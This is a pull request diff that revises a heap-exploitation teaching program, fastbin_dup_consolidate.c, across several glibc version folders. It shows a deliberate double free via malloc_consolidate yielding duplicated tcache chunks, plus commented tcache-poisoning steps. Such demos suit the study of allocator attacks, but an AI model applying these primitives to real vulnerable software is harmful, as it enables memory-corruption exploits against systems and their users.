### PR TITLE
Cleanup fastbin_dup_consolidate and prepare it for glibc version 2.41

### DIFF
--- a/glibc_2.27/fastbin_dup_consolidate.c
+++ b/glibc_2.27/fastbin_dup_consolidate.c
@@ -38,9 +38,6 @@ int main() {
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
 
-	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-	// void* ppoison = malloc(CHUNK_SIZE);
-
 	void* p1 = malloc(0x40);
 	printf("Allocate another chunk of the same size p1=%p \n", p1);
 
@@ -58,9 +55,6 @@ int main() {
 
 	printf("p2=%p.\n", p2);
 
-	// We could now free this chunk to put it in the tcache bin for the poison.
-	// free(ppoison);
-
 	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
 	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
@@ -71,14 +65,6 @@ int main() {
 	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
 	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
-
-	// *(long long*)p2 = target;
-	// If we can edit chunk contents after it has been allocated,
-	// that gives us UAF here and allows us to perform tcache poison.
-	//
-	// In reality since double free is usually the result of a dangling pointer,
-	// we likely (depending on the nature of the vulnerability) could have used
-	// the edit functionality on the dangling pointer directly. Oh well :)
 
 	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
 	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
@@ -94,8 +80,6 @@ int main() {
 	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
 	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
 	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
-
-	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }

--- a/glibc_2.27/fastbin_dup_consolidate.c
+++ b/glibc_2.27/fastbin_dup_consolidate.c
@@ -22,71 +22,80 @@ As of glibc version 2.35 it is called only in the following five places:
 
 We will be targeting the first place, so we will need to allocate a chunk that does not belong in the 
 small bin (since we are trying to get into the 'else' branch of this check: https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3901). 
-This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Interestingly, the 
+This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Notably, the 
 biggest tcache sized chunk is 0x410, so if our chunk is in the [0x400, 0x410] range we can utilize 
 a double free to gain control of a tcache sized chunk.   
-
 */
 
-int main() {
-	printf("This technique will make use of malloc_consolidate and a double free to gain a UAF / duplication in the tcache.\n");
-	printf("It would also allow us to perform tcache poisoning.\n\n");
+#define CHUNK_SIZE 0x400
 
-	printf("Lets fill up the tcache to force fastbin usage...\n\n");
+int main() {
+	printf("This technique will make use of malloc_consolidate and a double free to gain a duplication in the tcache.\n");
+	printf("Lets prepare to fill up the tcache in order to force fastbin usage...\n\n");
 
 	void *ptr[7];
 
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
+
+	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
+	// void* ppoison = malloc(CHUNK_SIZE);
+
+	void* p1 = malloc(0x40);
+	printf("Allocate another chunk of the same size p1=%p \n", p1);
+
+	printf("Fill up the tcache...\n");
 	for(int i = 0; i < 7; i++)
 		free(ptr[i]);
 
-	// void* ppoison = malloc(0x400);
-	// ^ We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-
-	void* p1 = calloc(1,0x40);
-	// Using calloc here doesn't take from the tcache since calloc calls _int_malloc (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3679) 
-	// and taking from the tcache is handled in __libc_malloc. If we used malloc(0x40) the chunk would get taken from the tcache.
-
-	printf("Allocate another chunk of the same size p1=%p \n", p1);
-  	printf("Freeing p1 will add it to the fastbin.\n\n");
+  	printf("Now freeing p1 will add it to the fastbin.\n\n");
   	free(p1);
-
-  	void* p3 = malloc(0x400);
-
-	// free(ppoison);
-	// We can now free this chunk to put it in the tcache bin for the poison.
 
 	printf("To trigger malloc_consolidate we need to allocate a chunk with large chunk size (>= 0x400)\n");
 	printf("which corresponds to request size >= 0x3f0. We will request 0x400 bytes, which will gives us\n");
-	printf("a tcache-sized chunk with chunk size 0x410. p3=%p\n", p3);
+	printf("a tcache-sized chunk with chunk size 0x410 ");
+  	void* p2 = malloc(CHUNK_SIZE);
 
-	printf("\nmalloc_consolidate will merge the fast chunk p1 with top.\n");
-	printf("p3 is allocated from top since there is no bin bigger than it. Thus, p1 = p3.\n");
+	printf("p2=%p.\n", p2);
 
-	assert(p1 == p3);
+	// We could now free this chunk to put it in the tcache bin for the poison.
+	// free(ppoison);
 
-  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p3).\n\n");
-	free(p1); // vulnerability
+	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
+	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
-	printf("So p1 is double freed, and p3 hasn't been freed although it now points to a free chunk.\n");
-	printf("We have thus achieved UAF on tcache!\n");
+	assert(p1 == p2);
 
-	// *(long long*)p3 = target;
-	// We can use the UAF here to perform tcache poison.
+  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p2).\n\n");
+	free(p1); // vulnerability (double free)
+	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
-	printf("We will request a chunk of size 0x400, this will give us the 0x410 chunk thats currently in\n");
-	printf("the tcache bin. p3 and p1 will still be pointing to it.\n");
-	void *p4 = malloc(0x400);
+	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
 
-	assert(p4 == p3);
+	// *(long long*)p2 = target;
+	// If we can edit chunk contents after it has been allocated,
+	// that gives us UAF here and allows us to perform tcache poison.
+	//
+	// In reality since double free is usually the result of a dangling pointer,
+	// we likely (depending on the nature of the vulnerability) could have used
+	// the edit functionality on the dangling pointer directly. Oh well :)
 
-	printf("We now have two pointers (p3 and p4) that haven't been directly freed\n");
-	printf("and both point to the same tcache sized chunk. p3=%p p4=%p\n", p3, p4);
+	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
+	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
+	void *p3 = malloc(CHUNK_SIZE);
+
+	assert(p3 == p2);
+
+	printf("We now have two pointers (p2 and p3) that haven't been directly freed\n");
+	printf("and both point to the same tcache sized chunk. p2=%p p3=%p\n", p2, p3);
 	printf("We have achieved duplication!\n\n");
 
 	printf("Note: This duplication would have also worked with a larger chunk size, the chunks would\n");
-	printf("have behaved the same, just being taken from the top instead of from the tcache bin.");
+	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
+	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
+	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
+
+	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }

--- a/glibc_2.31/fastbin_dup_consolidate.c
+++ b/glibc_2.31/fastbin_dup_consolidate.c
@@ -38,9 +38,6 @@ int main() {
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
 
-	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-	// void* ppoison = malloc(CHUNK_SIZE);
-
 	void* p1 = malloc(0x40);
 	printf("Allocate another chunk of the same size p1=%p \n", p1);
 
@@ -58,9 +55,6 @@ int main() {
 
 	printf("p2=%p.\n", p2);
 
-	// We could now free this chunk to put it in the tcache bin for the poison.
-	// free(ppoison);
-
 	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
 	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
@@ -71,14 +65,6 @@ int main() {
 	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
 	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
-
-	// *(long long*)p2 = target;
-	// If we can edit chunk contents after it has been allocated,
-	// that gives us UAF here and allows us to perform tcache poison.
-	//
-	// In reality since double free is usually the result of a dangling pointer,
-	// we likely (depending on the nature of the vulnerability) could have used
-	// the edit functionality on the dangling pointer directly. Oh well :)
 
 	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
 	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
@@ -94,8 +80,6 @@ int main() {
 	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
 	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
 	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
-
-	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }

--- a/glibc_2.31/fastbin_dup_consolidate.c
+++ b/glibc_2.31/fastbin_dup_consolidate.c
@@ -22,71 +22,80 @@ As of glibc version 2.35 it is called only in the following five places:
 
 We will be targeting the first place, so we will need to allocate a chunk that does not belong in the 
 small bin (since we are trying to get into the 'else' branch of this check: https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3901). 
-This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Interestingly, the 
+This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Notably, the 
 biggest tcache sized chunk is 0x410, so if our chunk is in the [0x400, 0x410] range we can utilize 
 a double free to gain control of a tcache sized chunk.   
-
 */
 
-int main() {
-	printf("This technique will make use of malloc_consolidate and a double free to gain a UAF / duplication in the tcache.\n");
-	printf("It would also allow us to perform tcache poisoning.\n\n");
+#define CHUNK_SIZE 0x400
 
-	printf("Lets fill up the tcache to force fastbin usage...\n\n");
+int main() {
+	printf("This technique will make use of malloc_consolidate and a double free to gain a duplication in the tcache.\n");
+	printf("Lets prepare to fill up the tcache in order to force fastbin usage...\n\n");
 
 	void *ptr[7];
 
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
+
+	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
+	// void* ppoison = malloc(CHUNK_SIZE);
+
+	void* p1 = malloc(0x40);
+	printf("Allocate another chunk of the same size p1=%p \n", p1);
+
+	printf("Fill up the tcache...\n");
 	for(int i = 0; i < 7; i++)
 		free(ptr[i]);
 
-	// void* ppoison = malloc(0x400);
-	// ^ We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-
-	void* p1 = calloc(1,0x40);
-	// Using calloc here doesn't take from the tcache since calloc calls _int_malloc (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3679) 
-	// and taking from the tcache is handled in __libc_malloc. If we used malloc(0x40) the chunk would get taken from the tcache.
-
-	printf("Allocate another chunk of the same size p1=%p \n", p1);
-  	printf("Freeing p1 will add it to the fastbin.\n\n");
+  	printf("Now freeing p1 will add it to the fastbin.\n\n");
   	free(p1);
-
-  	void* p3 = malloc(0x400);
-
-	// free(ppoison);
-	// We can now free this chunk to put it in the tcache bin for the poison.
 
 	printf("To trigger malloc_consolidate we need to allocate a chunk with large chunk size (>= 0x400)\n");
 	printf("which corresponds to request size >= 0x3f0. We will request 0x400 bytes, which will gives us\n");
-	printf("a tcache-sized chunk with chunk size 0x410. p3=%p\n", p3);
+	printf("a tcache-sized chunk with chunk size 0x410 ");
+  	void* p2 = malloc(CHUNK_SIZE);
 
-	printf("\nmalloc_consolidate will merge the fast chunk p1 with top.\n");
-	printf("p3 is allocated from top since there is no bin bigger than it. Thus, p1 = p3.\n");
+	printf("p2=%p.\n", p2);
 
-	assert(p1 == p3);
+	// We could now free this chunk to put it in the tcache bin for the poison.
+	// free(ppoison);
 
-  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p3).\n\n");
-	free(p1); // vulnerability
+	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
+	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
-	printf("So p1 is double freed, and p3 hasn't been freed although it now points to a free chunk.\n");
-	printf("We have thus achieved UAF on tcache!\n");
+	assert(p1 == p2);
 
-	// *(long long*)p3 = target;
-	// We can use the UAF here to perform tcache poison.
+  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p2).\n\n");
+	free(p1); // vulnerability (double free)
+	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
-	printf("We will request a chunk of size 0x400, this will give us the 0x410 chunk thats currently in\n");
-	printf("the tcache bin. p3 and p1 will still be pointing to it.\n");
-	void *p4 = malloc(0x400);
+	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
 
-	assert(p4 == p3);
+	// *(long long*)p2 = target;
+	// If we can edit chunk contents after it has been allocated,
+	// that gives us UAF here and allows us to perform tcache poison.
+	//
+	// In reality since double free is usually the result of a dangling pointer,
+	// we likely (depending on the nature of the vulnerability) could have used
+	// the edit functionality on the dangling pointer directly. Oh well :)
 
-	printf("We now have two pointers (p3 and p4) that haven't been directly freed\n");
-	printf("and both point to the same tcache sized chunk. p3=%p p4=%p\n", p3, p4);
+	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
+	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
+	void *p3 = malloc(CHUNK_SIZE);
+
+	assert(p3 == p2);
+
+	printf("We now have two pointers (p2 and p3) that haven't been directly freed\n");
+	printf("and both point to the same tcache sized chunk. p2=%p p3=%p\n", p2, p3);
 	printf("We have achieved duplication!\n\n");
 
 	printf("Note: This duplication would have also worked with a larger chunk size, the chunks would\n");
-	printf("have behaved the same, just being taken from the top instead of from the tcache bin.");
+	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
+	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
+	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
+
+	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }

--- a/glibc_2.32/fastbin_dup_consolidate.c
+++ b/glibc_2.32/fastbin_dup_consolidate.c
@@ -38,9 +38,6 @@ int main() {
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
 
-	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-	// void* ppoison = malloc(CHUNK_SIZE);
-
 	void* p1 = malloc(0x40);
 	printf("Allocate another chunk of the same size p1=%p \n", p1);
 
@@ -58,9 +55,6 @@ int main() {
 
 	printf("p2=%p.\n", p2);
 
-	// We could now free this chunk to put it in the tcache bin for the poison.
-	// free(ppoison);
-
 	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
 	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
@@ -71,15 +65,6 @@ int main() {
 	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
 	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
-
-	// *(long long*)p2 = target ^ ((long long)p2 >> 12);
-	// If we can edit chunk contents after it has been allocated,
-	// that gives us UAF here and allows us to perform tcache poison.
-	// We need to use a heap leak here due to safe linking.
-	//
-	// In reality since double free is usually the result of a dangling pointer,
-	// we likely (depending on the nature of the vulnerability) could have used
-	// the edit functionality on the dangling pointer directly. Oh well :)
 
 	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
 	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
@@ -95,8 +80,6 @@ int main() {
 	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
 	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
 	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
-
-	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }

--- a/glibc_2.32/fastbin_dup_consolidate.c
+++ b/glibc_2.32/fastbin_dup_consolidate.c
@@ -22,71 +22,81 @@ As of glibc version 2.35 it is called only in the following five places:
 
 We will be targeting the first place, so we will need to allocate a chunk that does not belong in the 
 small bin (since we are trying to get into the 'else' branch of this check: https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3901). 
-This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Interestingly, the 
+This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Notably, the 
 biggest tcache sized chunk is 0x410, so if our chunk is in the [0x400, 0x410] range we can utilize 
 a double free to gain control of a tcache sized chunk.   
-
 */
 
-int main() {
-	printf("This technique will make use of malloc_consolidate and a double free to gain a UAF / duplication in the tcache.\n");
-	printf("It would also allow us to perform tcache poisoning if we had a heap leak.\n\n");
+#define CHUNK_SIZE 0x400
 
-	printf("Lets fill up the tcache to force fastbin usage...\n\n");
+int main() {
+	printf("This technique will make use of malloc_consolidate and a double free to gain a duplication in the tcache.\n");
+	printf("Lets prepare to fill up the tcache in order to force fastbin usage...\n\n");
 
 	void *ptr[7];
 
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
+
+	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
+	// void* ppoison = malloc(CHUNK_SIZE);
+
+	void* p1 = malloc(0x40);
+	printf("Allocate another chunk of the same size p1=%p \n", p1);
+
+	printf("Fill up the tcache...\n");
 	for(int i = 0; i < 7; i++)
 		free(ptr[i]);
 
-	// void* ppoison = malloc(0x400);
-	// ^ We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-
-	void* p1 = calloc(1,0x40);
-	// Using calloc here doesn't take from the tcache since calloc calls _int_malloc (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3679) 
-	// and taking from the tcache is handled in __libc_malloc. If we used malloc(0x40) the chunk would get taken from the tcache.
-
-	printf("Allocate another chunk of the same size p1=%p \n", p1);
-  	printf("Freeing p1 will add it to the fastbin.\n\n");
+  	printf("Now freeing p1 will add it to the fastbin.\n\n");
   	free(p1);
-
-  	void* p3 = malloc(0x400);
-
-	// free(ppoison);
-	// We can now free this chunk to put it in the tcache bin for the poison.
 
 	printf("To trigger malloc_consolidate we need to allocate a chunk with large chunk size (>= 0x400)\n");
 	printf("which corresponds to request size >= 0x3f0. We will request 0x400 bytes, which will gives us\n");
-	printf("a tcache-sized chunk with chunk size 0x410. p3=%p\n", p3);
+	printf("a tcache-sized chunk with chunk size 0x410 ");
+  	void* p2 = malloc(CHUNK_SIZE);
 
-	printf("\nmalloc_consolidate will merge the fast chunk p1 with top.\n");
-	printf("p3 is allocated from top since there is no bin bigger than it. Thus, p1 = p3.\n");
+	printf("p2=%p.\n", p2);
 
-	assert(p1 == p3);
+	// We could now free this chunk to put it in the tcache bin for the poison.
+	// free(ppoison);
 
-  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p3).\n\n");
-	free(p1); // vulnerability
+	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
+	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
-	printf("So p1 is double freed, and p3 hasn't been freed although it now points to a free chunk.\n");
-	printf("We have thus achieved UAF on tcache!\n");
+	assert(p1 == p2);
 
-	// *(long long*)p3 = target ^ (p3 >> 12);
-	// We can use the UAF here to perform tcache poison.
+  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p2).\n\n");
+	free(p1); // vulnerability (double free)
+	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
-	printf("We will request a chunk of size 0x400, this will give us the 0x410 chunk thats currently in\n");
-	printf("the tcache bin. p3 and p1 will still be pointing to it.\n");
-	void *p4 = malloc(0x400);
+	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
 
-	assert(p4 == p3);
+	// *(long long*)p2 = target ^ ((long long)p2 >> 12);
+	// If we can edit chunk contents after it has been allocated,
+	// that gives us UAF here and allows us to perform tcache poison.
+	// We need to use a heap leak here due to safe linking.
+	//
+	// In reality since double free is usually the result of a dangling pointer,
+	// we likely (depending on the nature of the vulnerability) could have used
+	// the edit functionality on the dangling pointer directly. Oh well :)
 
-	printf("We now have two pointers (p3 and p4) that haven't been directly freed\n");
-	printf("and both point to the same tcache sized chunk. p3=%p p4=%p\n", p3, p4);
+	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
+	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
+	void *p3 = malloc(CHUNK_SIZE);
+
+	assert(p3 == p2);
+
+	printf("We now have two pointers (p2 and p3) that haven't been directly freed\n");
+	printf("and both point to the same tcache sized chunk. p2=%p p3=%p\n", p2, p3);
 	printf("We have achieved duplication!\n\n");
 
 	printf("Note: This duplication would have also worked with a larger chunk size, the chunks would\n");
-	printf("have behaved the same, just being taken from the top instead of from the tcache bin.");
+	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
+	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
+	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
+
+	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }

--- a/glibc_2.33/fastbin_dup_consolidate.c
+++ b/glibc_2.33/fastbin_dup_consolidate.c
@@ -38,9 +38,6 @@ int main() {
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
 
-	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-	// void* ppoison = malloc(CHUNK_SIZE);
-
 	void* p1 = malloc(0x40);
 	printf("Allocate another chunk of the same size p1=%p \n", p1);
 
@@ -58,9 +55,6 @@ int main() {
 
 	printf("p2=%p.\n", p2);
 
-	// We could now free this chunk to put it in the tcache bin for the poison.
-	// free(ppoison);
-
 	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
 	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
@@ -71,15 +65,6 @@ int main() {
 	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
 	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
-
-	// *(long long*)p2 = target ^ ((long long)p2 >> 12);
-	// If we can edit chunk contents after it has been allocated,
-	// that gives us UAF here and allows us to perform tcache poison.
-	// We need to use a heap leak here due to safe linking.
-	//
-	// In reality since double free is usually the result of a dangling pointer,
-	// we likely (depending on the nature of the vulnerability) could have used
-	// the edit functionality on the dangling pointer directly. Oh well :)
 
 	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
 	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
@@ -95,8 +80,6 @@ int main() {
 	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
 	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
 	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
-
-	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }

--- a/glibc_2.33/fastbin_dup_consolidate.c
+++ b/glibc_2.33/fastbin_dup_consolidate.c
@@ -22,71 +22,81 @@ As of glibc version 2.35 it is called only in the following five places:
 
 We will be targeting the first place, so we will need to allocate a chunk that does not belong in the 
 small bin (since we are trying to get into the 'else' branch of this check: https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3901). 
-This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Interestingly, the 
+This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Notably, the 
 biggest tcache sized chunk is 0x410, so if our chunk is in the [0x400, 0x410] range we can utilize 
 a double free to gain control of a tcache sized chunk.   
-
 */
 
-int main() {
-	printf("This technique will make use of malloc_consolidate and a double free to gain a UAF / duplication in the tcache.\n");
-	printf("It would also allow us to perform tcache poisoning if we had a heap leak.\n\n");
+#define CHUNK_SIZE 0x400
 
-	printf("Lets fill up the tcache to force fastbin usage...\n\n");
+int main() {
+	printf("This technique will make use of malloc_consolidate and a double free to gain a duplication in the tcache.\n");
+	printf("Lets prepare to fill up the tcache in order to force fastbin usage...\n\n");
 
 	void *ptr[7];
 
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
+
+	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
+	// void* ppoison = malloc(CHUNK_SIZE);
+
+	void* p1 = malloc(0x40);
+	printf("Allocate another chunk of the same size p1=%p \n", p1);
+
+	printf("Fill up the tcache...\n");
 	for(int i = 0; i < 7; i++)
 		free(ptr[i]);
 
-	// void* ppoison = malloc(0x400);
-	// ^ We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-
-	void* p1 = calloc(1,0x40);
-	// Using calloc here doesn't take from the tcache since calloc calls _int_malloc (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3679) 
-	// and taking from the tcache is handled in __libc_malloc. If we used malloc(0x40) the chunk would get taken from the tcache.
-
-	printf("Allocate another chunk of the same size p1=%p \n", p1);
-  	printf("Freeing p1 will add it to the fastbin.\n\n");
+  	printf("Now freeing p1 will add it to the fastbin.\n\n");
   	free(p1);
-
-  	void* p3 = malloc(0x400);
-
-	// free(ppoison);
-	// We can now free this chunk to put it in the tcache bin for the poison.
 
 	printf("To trigger malloc_consolidate we need to allocate a chunk with large chunk size (>= 0x400)\n");
 	printf("which corresponds to request size >= 0x3f0. We will request 0x400 bytes, which will gives us\n");
-	printf("a tcache-sized chunk with chunk size 0x410. p3=%p\n", p3);
+	printf("a tcache-sized chunk with chunk size 0x410 ");
+  	void* p2 = malloc(CHUNK_SIZE);
 
-	printf("\nmalloc_consolidate will merge the fast chunk p1 with top.\n");
-	printf("p3 is allocated from top since there is no bin bigger than it. Thus, p1 = p3.\n");
+	printf("p2=%p.\n", p2);
 
-	assert(p1 == p3);
+	// We could now free this chunk to put it in the tcache bin for the poison.
+	// free(ppoison);
 
-  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p3).\n\n");
-	free(p1); // vulnerability
+	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
+	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
-	printf("So p1 is double freed, and p3 hasn't been freed although it now points to a free chunk.\n");
-	printf("We have thus achieved UAF on tcache!\n");
+	assert(p1 == p2);
 
-	// *(long long*)p3 = target ^ (p3 >> 12);
-	// We can use the UAF here to perform tcache poison.
+  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p2).\n\n");
+	free(p1); // vulnerability (double free)
+	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
-	printf("We will request a chunk of size 0x400, this will give us the 0x410 chunk thats currently in\n");
-	printf("the tcache bin. p3 and p1 will still be pointing to it.\n");
-	void *p4 = malloc(0x400);
+	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
 
-	assert(p4 == p3);
+	// *(long long*)p2 = target ^ ((long long)p2 >> 12);
+	// If we can edit chunk contents after it has been allocated,
+	// that gives us UAF here and allows us to perform tcache poison.
+	// We need to use a heap leak here due to safe linking.
+	//
+	// In reality since double free is usually the result of a dangling pointer,
+	// we likely (depending on the nature of the vulnerability) could have used
+	// the edit functionality on the dangling pointer directly. Oh well :)
 
-	printf("We now have two pointers (p3 and p4) that haven't been directly freed\n");
-	printf("and both point to the same tcache sized chunk. p3=%p p4=%p\n", p3, p4);
+	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
+	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
+	void *p3 = malloc(CHUNK_SIZE);
+
+	assert(p3 == p2);
+
+	printf("We now have two pointers (p2 and p3) that haven't been directly freed\n");
+	printf("and both point to the same tcache sized chunk. p2=%p p3=%p\n", p2, p3);
 	printf("We have achieved duplication!\n\n");
 
 	printf("Note: This duplication would have also worked with a larger chunk size, the chunks would\n");
-	printf("have behaved the same, just being taken from the top instead of from the tcache bin.");
+	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
+	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
+	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
+
+	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }

--- a/glibc_2.34/fastbin_dup_consolidate.c
+++ b/glibc_2.34/fastbin_dup_consolidate.c
@@ -38,9 +38,6 @@ int main() {
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
 
-	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-	// void* ppoison = malloc(CHUNK_SIZE);
-
 	void* p1 = malloc(0x40);
 	printf("Allocate another chunk of the same size p1=%p \n", p1);
 
@@ -58,9 +55,6 @@ int main() {
 
 	printf("p2=%p.\n", p2);
 
-	// We could now free this chunk to put it in the tcache bin for the poison.
-	// free(ppoison);
-
 	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
 	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
@@ -71,15 +65,6 @@ int main() {
 	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
 	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
-
-	// *(long long*)p2 = target ^ ((long long)p2 >> 12);
-	// If we can edit chunk contents after it has been allocated,
-	// that gives us UAF here and allows us to perform tcache poison.
-	// We need to use a heap leak here due to safe linking.
-	//
-	// In reality since double free is usually the result of a dangling pointer,
-	// we likely (depending on the nature of the vulnerability) could have used
